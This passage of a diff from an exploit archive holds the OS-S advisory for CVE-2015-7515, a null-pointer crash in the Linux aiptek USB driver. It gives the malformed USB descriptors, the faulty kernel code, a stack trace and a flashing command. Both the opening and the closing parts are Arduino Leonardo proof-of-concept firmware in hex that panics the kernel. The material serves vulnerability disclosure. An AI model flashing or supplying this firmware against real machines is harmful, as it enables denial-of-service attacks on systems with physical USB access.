+:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 +:100540000895789484B5826084BD84B5816084BD4B +:1005500085B5826085BD85B5816085BDEEE6F0E03C +:10056000808181608083E1E8F0E010828081826098 +:100570008083808181608083E0E8F0E08081816019 +:100580008083E1E9F0E08081826080838081816006 +:100590008083E0E9F0E0808181608083E1ECF0E03D +:1005A000808184608083808182608083808181609B +:1005B0008083E3ECF0E0808181608083E0ECF0E018 +:1005C000808182608083E2ECF0E0808181608083C2 +:1005D000EAE7F0E0808184608083808182608083AC +:1005E000808181608083808180688083089590E02D +:1005F000FC013197EE30F10590F5EA5AFF4F0C946B +:10060000AB09809180008F7703C0809180008F7D3F +:1006100080938000089584B58F7702C084B58F7D64 +:1006200084BD0895809190008F7707C080919000DD +:100630008F7D03C080919000877F80939000089504 +:100640008091C0008F7703C08091C0008F7D809320 +:10065000C00008958091C200877F8093C2000895F2 +:10066000CF93DF9390E0FC01EA51FF4F2491FC010E +:10067000EC5FFE4F8491882349F190E0880F991F29 +:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 +:10069000C591D4919FB7611108C0F8948C912095B1 +:1006A00082238C93888182230AC0623051F4F894AB +:1006B0008C91322F309583238C938881822B888371 +:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 +:1006D00008950F931F93CF93DF931F92CDB7DEB78B +:1006E000282F30E0F901E853FF4F8491F901EA51D6 +:1006F000FF4F1491F901EC5FFE4F04910023C9F004 +:10070000882321F069830E94F7026981E02FF0E0DD +:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 +:100720008C91611103C01095812301C0812B8C93A2 +:100730009FBF0F90DF91CF911F910F910895CF939D +:10074000DF93282F30E0F901E853FF4F8491F9013E +:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 +:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 +:10077000EE5DFE4FA591B4912C912D2381E090E088 +:1007800021F480E002C080E090E0DF91CF910895F5 +:10079000615030F02091F100FC0120830196F8CFE8 +:1007A000289884E680937D0508951092E9001092C0 +:1007B00071051092700590936F0580936E050895F2 +:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 +:1007D000BA01C8010E94A606F80120E030E08EEFC1 +:1007E0002C173D0791F1F7FE02C0A49101C0A08132 +:1007F000609170057091710540916E0550916F0583 +:1008000064177507ACF49091E8009570E1F390914E +:10081000E80092FD1CC0A093F100A0917005B0917A +:1008200071051196AF73BB27AB2B11F48093E800D1 +:10083000A0917005B09171051196B0937105A093C8 +:1008400070052F5F3F4F3196CBCFC90102C08FEFAC +:100850009FEFDF91CF911F910F91FF9008951F920D +:100860000F920FB60F9211246F927F928F929F92E8 +:10087000AF92BF92CF92DF92EF92FF920F931F93AE +:100880002F933F934F935F936F937F938F939F9398 +:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 +:1008A0006297DEBFCDBF1092E9008091E80083FF20 +:1008B00046C168E0CE010A960E94C80382EF809389 +:1008C000E8009A8597FF05C08091E80080FFFCCF83 +:1008D00003C08EEF8093E800892F807609F023C152 +:1008E0008B85811105C01092F1001092F10020C19A +:1008F000282F2D7F213009F41BC1853049F48091C8 +:10090000E80080FFFCCF8C8580688093E30010C1F5 +:10091000863009F0E1C02D8508891989223009F057 +:10092000B3C0EC848E2D90E0209173053091740556 +:10093000821793070CF09FC00E94D5031F92EF927D +:100940008DE394E09F938F930E9483068CE0E89E52 +:1009500070011124E0917505F0917605EE0DFF1DF3 +:1009600089E0DE01119601900D928A95E1F7C801A8 +:100970000E94D50349E050E0BE016F5F7F4F80E0E9 +:100980000E94E0030F900F900F900F90C12CD12C7C +:10099000612C712C33E7A32E34E0B32E4AEA842E67 +:1009A00044E0942EE0917505F0917605EE0DFF1D63 +:1009B000818590E0681679060CF0BAC07F926F923C +:1009C000BF92AF920E948306E0917505F091760583 +:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 +:1009E00080E00E94E0030F900F900F900F9000E0C6 +:1009F00010E0E0917505F0917605EE0DFF1D028483 +:100A0000F385E02DEC0DFD1D818590E00817190799 +:100A10005CF51F930F939F928F920E948306E09143 +:100A20007505F0917605EE0DFF1D0284F385E02D2E +:100A3000EC0DFD1DC801880F991FA485B585A80F71 +:100A4000B91F4D915C910284F385E02DE80FF91FE9 +:100A50006081718180E00E94E0030F5F1F4F0F9063 +:100A60000F900F900F90C5CF8FEF681A780A8EE025 +:100A7000C80ED11C97CF8FED94E09F938F930E9467 +:100A800083060F900F9058C0C8012A8B0E94D5038F +:100A90002A892130C1F0233009F04EC08C851F9285 +:100AA0008F9389EF94E09F938F930E94830642E097 +:100AB00050E062E871E080E00E94E0030F900F9048 +:100AC0000F900F9035C04091000150E060E071E060 +:100AD00080E00E94E0032CC0873071F1883021F45F +:100AE00081E08093F10024C0893011F5937021F5E5 +:100AF000EDE4F1E081E021E096E38093E9002093CA +:100B0000EB0034913093EC009093ED008F5F3196C1 +:100B1000843099F78EE78093EA001092EA008C8582 +:100B20008093720505C0888999890E94D50304C005 +:100B30008EEF8093E80003C081E28093EB00629621 +:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE +:100B5000EF91BF91AF919F918F917F916F915F9135 +:100B60004F913F912F911F910F91FF90EF90DF9048 +:100B7000CF90BF90AF909F908F907F906F900F908D +:100B80000FBE0F901F9018951F920F920FB60F92E5 +:100B900011248F939F938091E1001092E10083FFD5 +:100BA0000FC01092E90091E09093EB001092EC00DE +:100BB00092E39093ED001092720598E09093F0000C +:100BC00082FF1AC080917E05882339F080917E05CE +:100BD000815080937E05882369F080917D0588236C +:100BE00059F080917D05815080937D05811104C06D +:100BF000289A02C05D9AF1CF9F918F910F900FBEFE +:100C00000F901F901895CF93DF93CDB7DEB782E199 +:100C1000FE013596A0E0B1E001900D928A95E1F7D2 +:100C20008F89988D9093760580937505898D9A8D1F +:100C300090937405809373058B8D9C8D90937C05A8 +:100C400080937B058D8D9E8D90937A058093790599 +:100C50008F8D98A1909378058093770510927205F7 +:100C600081E08093D70080EA8093D80082E189BD3B +:100C700009B400FEFDCF61E070E080E090E00E94EA +:100C80007B0280E98093D8008CE08093E200109290 +:100C9000E000559A209ADF91CF91089581E08093EA +:100CA000E00008959091C80095FFFCCF8093CE009E +:100CB00008951092CD0087E68093CC0088E1809360 +:100CC000C9008EE08093CA0008950F931F93CF93BD +:100CD000DF93EC018C01FE0101900020E9F73197D0 +:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E +:100CF000F80181918F010E945206EDCFDF91CF91D3 +:100D00001F910F910895CF93DF93CDB7DEB7DA959A +:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 +:100D2000419151919F0160E071E0CE0101960E94D6 +:100D30000707CE0101960E946506D3950FB6F89479 +:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE +:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 +:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E +:100D70003F932F9389839A830E9483068981882ECB +:100D80009A81992E0F900F9000E010E08EE5E82EEA +:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 +:100DA000E4F4F40181914F0190E09F938F93FF92BF +:100DB000EF920E9483060F5F1F4FC8018F70992723 +:100DC0000F900F900F900F90892B41F7DF92CF92E9 +:100DD0000E9483060F900F90E1CF81E194E09F93F2 +:100DE0008F930E9483060F900F900F900F90DF91CA +:100DF000CF911F910F91FF90EF90DF90CF90BF9018 +:100E0000AF909F908F900895F8940C94E809AEE00D +:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 +:100E20004C831A83098377FF02C060E070E8615049 +:100E300071097E836D83A901BC01CE0101960E94D8 +:100E400033074D815E8157FD0AC02F8138854217D7 +:100E500053070CF49A01F801E20FF31F10822E964B +:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB +:100E7000B1097C016B018A01FC0117821682838112 +:100E800081FFBDC1CE0101964C01F7019381F601AE +:100E900093FD859193FF81916F01882309F4ABC184 +:100EA000853239F493FD859193FF81916F018532ED +:100EB00029F4B70190E00E941B09E7CF512C312C97 +:100EC00020E02032A0F48B3269F030F4803259F007 +:100ED000833269F420612CC08D3239F0803339F4CB +:100EE000216026C02260246023C0286021C027FD25 +:100EF00027C030ED380F3A3078F426FF06C0FAE00C +:100F00005F9E300D1124532E13C08AE0389E300DA1 +:100F10001124332E20620CC08E3221F426FD6BC1C9 +:100F2000206406C08C3611F4206802C0883641F473 +:100F3000F60193FD859193FF81916F018111C1CFDE +:100F4000982F9F7D9554933028F40C5F1F4FFFE33B +:100F5000F9830DC0833631F0833771F0833509F0A2 +:100F60005BC022C0F801808189830E5F1F4F44243B +:100F70004394512C540115C03801F2E06F0E711CDE +:100F8000F801A080B18026FF03C0652D70E002C08B +:100F90006FEF7FEFC5012C870E9410092C018301A0 +:100FA0002C852F77222E17C03801F2E06F0E711CAE +:100FB000F801A080B18026FF03C0652D70E002C05B +:100FC0006FEF7FEFC5012C870E9405092C012C854E +:100FD0002068222E830123FC1BC0832D90E048163D +:100FE0005906B0F4B70180E290E00E941B093A94E0 +:100FF000F4CFF50127FC859127FE81915F01B701B0 +:1010000090E00E941B0931103A94F1E04F1A510808 +:101010004114510471F7E5C0843611F0893639F571 +:10102000F80127FF07C060817181828193810C5F85 +:101030001F4F08C060817181882777FD8095982FA8 +:101040000E5F1F4F2F76B22E97FF09C090958095A7 +:10105000709561957F4F8F4F9F4F2068B22E2AE089 +:1010600030E0A4010E944D09A82EA81844C085377D +:1010700029F42F7EB22E2AE030E025C0F22FF97F2E +:10108000BF2E8F36C1F018F4883579F0B4C08037A0 +:1010900019F0883721F0AFC02F2F2061B22EB4FE97 +:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D +:1010B0009660B92E06C028E030E005C020E130E09F +:1010C00002C020E132E0F801B7FE07C06081718103 +:1010D000828193810C5F1F4F06C06081718180E027 +:1010E00090E00E5F1F4FA4010E944D09A82EA81882 +:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 +:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 +:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 +:10112000FE01EA0DF11D8081803311F4297E09C092 +:1011300022FF06C07394739404C0822F867809F04E +:10114000739423FD13C020FF06C05A2C731418F4A7 +:10115000530C5718732C731468F4B70180E290E0B5 +:101160002C870E941B0973942C85F5CF731410F4FF +:10117000371801C0312C24FF12C0B70180E390E082 +:101180002C870E941B092C8522FF17C021FF03C05A +:1011900088E590E002C088E790E0B7010CC0822F9C +:1011A000867859F021FD02C080E201C08BE227FD64 +:1011B0008DE2B70190E00E941B09A51438F4B70135 +:1011C00080E390E00E941B095A94F7CFAA94F4019F +:1011D000EA0DF11D8081B70190E00E941B09A1106A +:1011E000F5CF332009F451CEB70180E290E00E94A0 +:1011F0001B093A94F6CFF7018681978102C08FEFE1 +:101200009FEF2C96E2E10C94CD09FC010590615012 +:1012100070400110D8F7809590958E0F9F1F08950C +:10122000FC016150704001900110D8F780959095B5 +:101230008E0F9F1F08950F931F93CF93DF93182F47 +:10124000092FEB018B8181FD03C08FEF9FEF20C041 +:1012500082FF10C04E815F812C813D814217530770 +:101260007CF4E881F9819F012F5F3F4F3983288308 +:10127000108306C0E885F985812F0995892B29F708 +:101280002E813F812F5F3F4F3F832E83812F902FF1 +:10129000DF91CF911F910F910895FA01AA2728306D +:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 +:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF +:1012C000781F891F9A1FA11D680F791F8A1F911D02 +:1012D000A11D6A0F711D811D911DA11D20D009F452 +:1012E00068943F912AE0269F11243019305D319394 +:1012F000DEF6CF010895462F4770405D4193B3E07D +:101300000FD0C9F7F6CF462F4F70405D4A3318F023 +:10131000495D31FD4052419302D0A9F7EACFB4E0D4 +:10132000A6959795879577956795BA95C9F700978C +:101330006105710508959B01AC010A2E069457952D +:10134000479537952795BA95C9F7620F731F841F84 +:10135000951FA01D0895EE0FFF1F0590F491E02D3D +:1013600009942F923F924F925F926F927F928F9249 +:101370009F92AF92BF92CF92DF92EF92FF920F9324 +:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E +:10139000F894DEBF0FBECDBF09942A8839884888EB +:1013A0005F846E847D848C849B84AA84B984C88481 +:1013B000DF80EE80FD800C811B81AA81B981CE0F78 +:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D +:0413D000F894FFCFBF +:1013D4001201000200000040AD0BEFBE000101024B +:1013E4000001220342006100640020004200410029 +:1013F40042004500250078002500780025006E0095 +:1014040025007000180342004100440020004300FE +:10141400300046004600450045002100120100024C +:1014240000000040820403020001010203010902DA +:10143400270001010000FA0705810304040C0705D5 +:10144400010204000C0705820104000C07000700D8 +:101454000700480100500072006F006C00690066CC +:101464000069006300000A550000006BFD180A00C3 +:10147400809F0AB901312B940A8101128946001315 +:10148400000257028B0A5E0AF80A5F01F212010099 +:1014940002010000400D055702000101020301B9D9 +:1014A4000A0100F80A5F0A810A220342006100640B +:1014B400002000420041004200450025007800253C +:1014C40000780025006E00250070001803420041DA +:1014D400004400200043003000460046004500451B +:1014E40000210012010002010000400D0557020016 +:1014F400010102030109040000030100000003F2DA +:101504000AEC0A0902270001010000FA01AB0A09EA +:101514000400000301000000090200202020202014 +:101524005F5F5F5F5F5F5F5F2020202020202020BF +:1015340020202020202020202020202020202020A7 +:1015440020205F5F5F5F5F205F5F20205F2020209F +:101554002020205F5F0A0D00202020202F205F5FC5 +:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 +:101574005F5F20205F5F5F5F5F20202020202F209F +:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 +:10159400202F5F5F0A0D002020202F202F202020E5 +:1015A4002F205F5F205C2F205F5F20602F205F5F14 +:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A +:1015C400205C2F205F5F2F202F205F5F5F2F202F55 +:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 +:1015E4002F202F202F202F5F2F202F202F5F2F2001 +:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 +:101604002F202F5F2F202F202F5F5F2F202C3C0AAD +:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 +:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F +:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 +:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 +:101654003C3C2043485241534820414E59204F506E +:1016640045524154494E472053595354454D203E09 +:101674003E0A0D00203C3C202863292053657267F4 +:10168400656A20536368756D696C6F20323031353B +:101694002C204F70656E536F7572636520536563BC +:1016A40075726974792052616C66205370656E6E30 +:1016B4006562657267203E3E0A0D000A3E3E205078 +:1016C4007265737320627574746F6E20746F207307 +:1016D4007461727420657865637574696F6E2E2EFB +:1016E4002E0A0D005B44454255475D2045786563ED +:1016F400757465207061796C6F616420300A0D0027 +:10170400526563762D446174613A0A0D005B444569 +:101714004255475D200953656E6420436F6E6669C8 +:101724006775726174696F6E44657363726970740E +:101734006F720928696E6465783A2569292E2E2E00 +:101744000D0A005B44454255475D200953656E64AC +:1017540020496E74657266616365204465736372C3 +:101764006970746F720928696E7465726661636565 +:101774003A2569292E2E2E0D0A005B444542554711 +:101784005D200953656E6420456E64706F696E74E4 +:101794002044657363726970746F720928656E649E +:1017A400706F696E743A2569292E2E2E0D0A005B1E +:1017B40044454255475D203C3C70616E6963206D31 +:1017C4006F64653F3E3E0D0A005B44454255475DEC +:1017D4002009203E3E20537472696E67204465736D +:1017E40063726970746F72207265717565737420A9 +:1017F4002D2073656E64696E67206D616C666F720F +:101804006D656420737472696E67212073657475E5 +:10181400702E7756616C75654C203D3D2025690D11 +:101824000A005B48455844554D505D0A0D0025306B +:041834003258200006 +:00000001FF diff --git a/platforms/linux/dos/39544.txt b/platforms/linux/dos/39544.txt new file mode 100755 index 000000000..ee41b8168 --- /dev/null +++ b/platforms/linux/dos/39544.txt @@ -0,0 +1,614 @@ +OS-S Security Advisory 2016-05 +Linux aiptek Nullpointer Dereference + +Date: March 4th, 2016 +Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg +CVE: CVE-2015-7515 +CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) +Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid +USB device descriptors (aiptek driver) +Severity: Critical. The Kernel panics. A reboot is required. +Ease of Exploitation: Trivial +Vulnerability type: Wrong input validation +Products: RHEL 7.1 including all updates +Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the +CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) +Vendor: Red Hat +Vendor contacted: November, 12th 2015 +PDF of Advisory: https://os-s.net/advisories/OSS-2016-05_aiptek.pdf + +Abstract: +The Kernel 3.10.0-229.20.1.el7.x86_64 crashes when presented a buggy USB +device using the aiptek driver. + +Detailed product description: +We confirmed the bug on the following system: +RHEL 7.1 +Kernel 3.10.0-229.20.1.el7.x86_64 +Further products or kernel versions have not been tested. +How reproducible: Always +Actual results: Kernel crashes. + +Description: +The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo +(github.com/schumilo) using the following device descriptor: + +[*] Device-Descriptor +bLength: 0x12 +bDescriptorType: 0x1 +bcdUSB: 0x200 +bDeviceClass: 0x3 +bDeviceSubClass: 0x0 +bDeviceProtocol: 0x0 +bMaxPacketSize: 0x40 +idVendor: 0x458 +idProduct: 0x5003 +bcdDevice: 0x100 +iManufacturer: 0x1 +iProduct: 0x2 +iSerialNumbers: 0x3 +bNumConfigurations: 0x1 +[*] Configuration-Descriptor +bLength: 0x9 +bDescriptorType: 0x2 +wTotalLength: 0x27 +bNumInterfaces: 0x1 +bConfigurationValue: 0x1 +iConfiguration: 0x0 +bmAttributes: 0x0 +bMaxPower: 0x31 +[*] Interface-Descriptor +bLength: 0x9 +bDescriptorType: 0x4 +bInterfaceNumber: 0x0 +bAlternateSetting: 0x0 +bNumEndpoints: 0x0 +bInterfaceClass: 0x0 +bInterfaceSubClass: 0x0 +bInterfaceProtocol: 0x0 +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x81 +bmAttribut: 0x3 +wMaxPacketSize: 0x404 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x1 +bmAttribut: 0x2 +wMaxPacketSize: 0x4 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x82 +bmAttribut: 0x1 +wMaxPacketSize: 0x4 +bInterval: 0xc + +The aiptek driver assumes that there will be at least one endpoint-descriptor. +If the interface-descriptor contains a zero-value for bNumEndpoints or no +endpoint-descriptor is provided, the driver tries to dereference a null- +pointer and the kernel crashes: + +**** +$ nm aiptek.ko.debug | grep aiptek_probe +0000000000001ea0 t aiptek_probe +$ addr2line -e aiptek.ko.debug 2303 +/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_ +64/drivers/input/tablet/aiptek.c:1830 +**** + +**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/aiptek.c) + +1822 endpoint = &intf->altsetting[0].endpoint[0].desc; /* Nullpointer */ +1823 +1824 /* Go set up our URB, which is called when the tablet receives +1825 * input. +1826 */ +1827 usb_fill_int_urb(aiptek->urb, +1828 aiptek->usbdev, +1829 usb_rcvintpipe(aiptek->usbdev, +1830 endpoint->bEndpointAddress), /* Nullpointer- +Dereference */ +1831 aiptek->data, 8, aiptek_irq, aiptek, +1832 endpoint->bInterval); +**** + +Proof of Concept: +For a proof of concept, we are providing an Arduino Leonardo firmware file. This +firmware will emulate the defective USB device. + +avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U +flash:w:binary.hex + +The firmware has been attached to this bug report. +To prevent the automated delivery of the payload, a jumper may be used to +connect port D3 and 3V3! + +Severity and Ease of Exploitation: +The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, +only physical access to the system is required. + +Vendor Communication: +We contacted Red Hat on the November, 12th 2015. +A patch was provided on the November, 25th 2015. + +References: +https://bugzilla.redhat.com/show_bug.cgi?id=1285326 +https://bugzilla.redhat.com/show_bug.cgi?id=1283350 + +Kernel Stacktrace: + +[ 622.149957] usb 1-1: new full-speed USB device number 2 using xhci_hcd +[ 622.354485] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint +descriptors, different from the interface descriptor's value: 0 +[ 622.386630] usb 1-1: New USB device found, idVendor=0458, idProduct=5003 +[ 622.392414] usb 1-1: New USB device strings: Mfr=1, Product=2, +SerialNumber=3 +[ 622.399416] usb 1-1: Product: Ä? +[ 622.404640] usb 1-1: Manufacturer: Ä? +[ 622.410079] usb 1-1: SerialNumber: % +[ 622.444650] BUG: unable to handle kernel NULL pointer dereference at +0000000000000002 +[ 622.445019] IP: [] aiptek_probe+0x463/0x658 [aiptek] +[ 622.445019] PGD 0 +[ 622.445019] Oops: 0000 [#1] SMP +[ 622.445019] Modules linked in: aiptek(+) ip6t_rpfilter ip6t_REJECT +ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc +ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 +nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter +ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat +nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter +ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper +drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c +sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix +libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod +[ 622.445019] CPU: 0 PID: 2242 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 622.445019] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 622.445019] task: ffff88000e65a220 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000 +[ 622.445019] RIP: 0010:[] [] +aiptek_probe+0x463/0x658 [aiptek] +[ 622.445019] RSP: 0018:ffff88000f4cfb80 EFLAGS: 00010286 +[ 622.445019] RAX: 0000000000000000 RBX: ffff88000bd67800 RCX: ffff88000bcd0800 +[ 622.445019] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff88000ca29000 +[ 622.445019] RBP: ffff88000f4cfbe0 R08: 0000000000000000 R09: 0000000000000000 +[ 622.445019] R10: ffff88000e401400 R11: ffffffff810020d8 R12: ffff88000c525800 +[ 622.445019] R13: ffff88000c525830 R14: ffff88000bcd1800 R15: ffff88000bd67834 +[ 622.445019] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 622.445019] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 622.445019] CR2: 0000000000000002 CR3: 000000000d67f000 CR4: +00000000000006f0 +[ 622.445019] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 622.445019] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 622.445019] Stack: +[ 622.445019] ffff88000bcd0800 0000000000000001 0000019000000246 +0000019000000032 +[ 622.445019] 0000006400000019 0000012c000000c8 000000000cc3e092 +ffff88000bcd0890 +[ 622.445019] ffff88000bcd0800 ffffffffa0397068 ffff88000c525830 ffffffffa03965c0 +[ 622.445019] Call Trace: +[ 622.445019] [] usb_probe_interface+0x1c4/0x2f0 +[ 622.445019] [] driver_probe_device+0x87/0x390 +[ 622.445019] [] __driver_attach+0x93/0xa0 +[ 622.445019] [] ? __device_attach+0x40/0x40 +[ 622.445019] [] bus_for_each_dev+0x73/0xc0 +[ 622.445019] [] driver_attach+0x1e/0x20 +[ 622.445019] [] bus_add_driver+0x200/0x2d0 +[ 622.445019] [] driver_register+0x64/0xf0 +[ 622.445019] [] usb_register_driver+0x82/0x160 +[ 622.445019] [] ? 0xffffffffa0399fff +[ 622.445019] [] aiptek_driver_init+0x1e/0x1000 [aiptek] +[ 622.445019] [] do_one_initcall+0xb8/0x230 +[ 622.445019] [] load_module+0x133e/0x1b40 +[ 622.445019] [] ? ddebug_proc_write+0xf0/0xf0 +[ 622.445019] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 622.445019] [] SyS_finit_module+0xa6/0xd0 +[ 622.445019] [] system_call_fastpath+0x16/0x1b +[ 622.445019] Code: 45 31 c9 45 31 c0 b9 ff 03 00 00 be 08 00 00 00 4c 89 f7 +e8 90 39 0d e1 49 8b 04 24 48 8b 4b 08 48 8b bb 10 01 00 00 48 8b 40 18 <0f> +b6 50 02 0f b6 70 06 8b 01 c1 e2 0f c1 e0 08 81 ca 80 00 00 +[ 622.445019] RIP [] aiptek_probe+0x463/0x658 [aiptek] +[ 622.445019] RSP +[ 622.445019] CR2: 0000000000000002 +[ 622.860772] ---[ end trace b239663354a1c556 ]--- +[ 622.864813] Kernel panic - not syncing: Fatal exception +[ 622.865768] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C2050C942D04CE +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940C02C3 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C50009030C0306 +:1000B000FF0203032D032D032D0310031403180364 +:1000C0001E0322032D0328030000000200080E0077 +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E0EDF3E102C005900D92A436B107D5 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9402070C940000089547 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E949F020E94C70060E06D +:1001B00083E00E942E0361E087E00E942E0361E04D +:1001C00088E00E942E030E9457067E012AE9E20E73 +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93F90168 +:1002C0009082E4E0D9011196EC93F901DC01292D2B +:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB +:1002E0001B96FC93EE931A971D96BC92AE921C97A8 +:1002F0001183008373836283558344830C521109F5 +:100300002CE0F80111922A95E9F721E0D80119961D +:100310002C931997FE01E059FF4F01900D929A948A +:10032000E1F7F8019387828761E088E00E94670324 +:100330008BE492E00E94630688E892E00E946306E4 +:1003400087EC92E00E94630686E093E00E946306D9 +:1003500082E493E00E9463068FE793E00E946306C5 +:1003600084EA93E00E9463068BEE93E00E946306AA +:1003700083E00E949D03892B09F047C05E01F3E2F0 +:10038000AF0EB11C8824839482E1982E84E194E01E +:100390000E946306BF92AF92DF92CF92FF92EF92DC +:1003A0001F928F921F930F932DB73EB722513109A1 +:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6 +:1003C000FE01FB96892D01900D928A95E1F78DE64D +:1003D00095E00E94010668E873E180E090E00E94E9 +:1003E00079028DE695E00E944C0660E087E00E946D +:1003F000670368E873E180E090E00E9479020FB63D +:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0 +:1004100090E00E947902ACCF1F920F920FB60F921C +:1004200011242F933F938F939F93AF93BF9380910A +:10043000650590916605A0916705B09168053091BA +:10044000640523E0230F2D3720F40196A11DB11D73 +:1004500005C026E8230F0296A11DB11D2093640557 +:100460008093650590936605A0936705B093680532 +:100470008091690590916A05A0916B05B0916C051A +:100480000196A11DB11D8093690590936A05A09303 +:100490006B05B0936C05BF91AF919F918F913F9188 +:1004A0002F910F900FBE0F901F9018953FB7F894A3 +:1004B0008091690590916A05A0916B05B0916C05DA +:1004C00026B5A89B05C02F3F19F00196A11DB11DAF +:1004D0003FBF6627782F892F9A2F620F711D811DCC +:1004E000911D42E0660F771F881F991F4A95D1F72B +:1004F0000895CF92DF92EF92FF92CF93DF936B013B +:100500007C010E945602EB01C114D104E104F10404 